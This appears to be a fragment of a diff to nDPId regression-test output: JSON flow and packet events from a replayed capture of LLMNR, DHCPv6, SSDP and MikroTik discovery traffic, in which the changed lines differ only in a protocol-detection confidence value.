-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1470104402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104402624,"pkt":"AQBeAAD8PKn0WgOECABFAAA3H1kAAAER9MzAqAPs4AAA\/PJ1FOsAI4uZs34AAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1470104402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104402624,"pkt":"AQBef\/\/6bEAIlAI6CABFAACl1ocAAAERLO7AqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1470104402724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104402724,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQADwkcU6wAjpJ6zfgAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1470104402724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104402724,"pkt":"AQBeAAD8PKn0WgOECABFAAA3H1wAAAER9MnAqAPs4AAA\/PJ1FOsAI4uZs34AAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1470104403134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104403134,"pkt":"AQBeAAD8SNIkYzEACABFAAA2Ow0AAAER19nAqAUs4AAA\/OVOFOsAIo78hQUAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1470104403234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104403234,"pkt":"AQBeAAD8SNIkYzEACABFAAA2Ow8AAAER19fAqAUs4AAA\/OVOFOsAIo78hQUAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1470104404055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104404055,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfbcLBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgAAAAYABAAXABg="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":200000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1470104405794,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1470104405794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1470104405794,"pkt":"\/\/\/\/\/\/\/\/TF4MVkdPCABFAACVAABAAEARAq7AqHcC\/\/\/\/\/6sKFi4AgSnvAAHqAgABAAZMXgxWR08ABQAJSVB2NlJvdXRlAAcADzYuMzUuNCAoc3RhYmxlKQAIAAhNaWtyb1RpawAKAAQGBzYAAAsACVZTMUwtUTE4UgAMAAZSQjQ1MEcADgABAQAPABAgAbAwAhQBAAAAAAAAAAABABAAA0xBTg=="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1470104406717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104406717,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1470104406717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104406717,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LR4AAAER5cfAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1470104406818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104406818,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfJ0LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgEaAAYABAAXABg="} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LSAAAAER5cXAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104408049,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104408049,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KyAAAAER6Y\/AqANf4AAA\/Mj7FOsAJrP2U3QAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1470104408457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104408457,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1470104408458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104408458,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KyIAAAER6Y3AqANf4AAA\/Mj7FOsAJrP2U3QAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1470104408662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104408662,"pkt":"\/\/\/\/\/\/\/\/wKC7c+tHCABFAAFZOwBAAEARwM3AqH0e\/\/\/\/\/\/YA9gABRUfM\/\/+TXaAAwKC7c+tHwKh9HgAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+tHQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDI1AAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqH0e\/\/8AAFBvcnQgMTAAIAGwMAIUAQDCoLv\/\/nPrR0A="} 
